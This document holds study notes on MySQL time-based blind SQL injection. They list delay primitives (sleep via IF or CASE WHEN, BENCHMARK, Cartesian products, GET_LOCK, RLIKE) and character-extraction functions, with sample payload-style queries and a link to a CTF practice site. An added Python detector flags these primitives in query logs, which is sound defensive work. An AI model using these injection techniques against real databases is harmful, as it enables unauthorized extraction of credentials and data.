Time-based blind injection
sleep
1. Triggered through an IF condition
IF()
select if(1,2,3)
substr(str, position, len)
substring(str, position, len) == substring(str FROM position FOR len)
substring_index(str, delimiter, count)  -- str: the field to cut; delimiter: the keyword; count: which occurrence of the keyword to cut at
select * from user where password='123456'; # assuming the password is 123456
select * from user where password rlike '^1';
select * from user where password regexp '^1';
2. Triggered through SELECT CASE WHEN
SELECT CASE WHEN username='admin' THEN 'xxx' ELSE sleep(3) END FROM user;
BENCHMARK
Cartesian product
Making the computation slow really just means making the database do more operations.
select count(*) from usera, userb;
Assume usera is
id | value |
---|---|
1 | 1 |
2 | 2 |
and userb is
id | value |
---|---|
1 | 1 |
2 | 2 |
then the result is 2*2
GET_LOCK
Only effective over a persistent (long-lived) connection
RLIKE
Construct a long string, then match against it.
tip: test website
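As an added defender-side example (not part of these notes), the following Python scans constructed query-log lines for the delay primitives listed above: sleep, benchmark, get_lock, a comma-joined table cross product, and an RLIKE pattern with a nested quantifier. The log line format, table names and the rule thresholds are assumptions.

```python
import re

# Constructed sample query-log lines (not from the page): one benign
# query followed by queries carrying each delay primitive from the notes.
SAMPLE_LOG = """\
2024-01-01T10:00:01 app select * from user where username='alice'
2024-01-01T10:00:02 app select * from user where id=1 and if(substr(password,1,1)='1',sleep(5),0)
2024-01-01T10:00:03 app select case when username='admin' then 'xxx' else sleep(3) end from user
2024-01-01T10:00:04 app select * from user where id=1 and benchmark(1000000,sha1('x'))
2024-01-01T10:00:05 app select * from user where id=1 and get_lock('x',10)
2024-01-01T10:00:06 app select count(*) from usera, userb, userc, userd
2024-01-01T10:00:07 app select * from user where password rlike '^(a+)+$'
"""

# Each rule names a delay primitive and a regex for its usual shape in
# query text (case-insensitive, tolerant of spacing before the paren).
RULES = {
    "sleep": re.compile(r"\bsleep\s*\(", re.I),
    "benchmark": re.compile(r"\bbenchmark\s*\(", re.I),
    "get_lock": re.compile(r"\bget_lock\s*\(", re.I),
    # three or more comma-joined tables in FROM with no join condition:
    # the Cartesian-product shape (threshold of 3 is an assumption)
    "cartesian": re.compile(r"\bfrom\s+\w+(\s*,\s*\w+){2,}\s*(;|$)", re.I),
    # nested quantifier inside an RLIKE/REGEXP literal, e.g. '(a+)+',
    # the shape that makes the regex engine backtrack catastrophically
    "rlike_redos": re.compile(r"\b(rlike|regexp)\s+'[^']*\([^')]*[+*]\)[+*]", re.I),
}

def classify(query):
    """Return the names of all delay primitives found in one query string."""
    return [name for name, rx in RULES.items() if rx.search(query)]

def scan_log(text):
    """Return (line_number, primitives) for every log line that triggers a rule."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        found = classify(line)
        if found:
            hits.append((n, found))
    return hits

if __name__ == "__main__":
    for n, found in scan_log(SAMPLE_LOG):
        print(f"line {n}: {', '.join(found)}")
```

Pair these string matches with the database's slow query log (queries whose wall time is far above their normal cost) to cut false positives.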
http://ctf5.shiyanbar.com/web/baocuo/index.php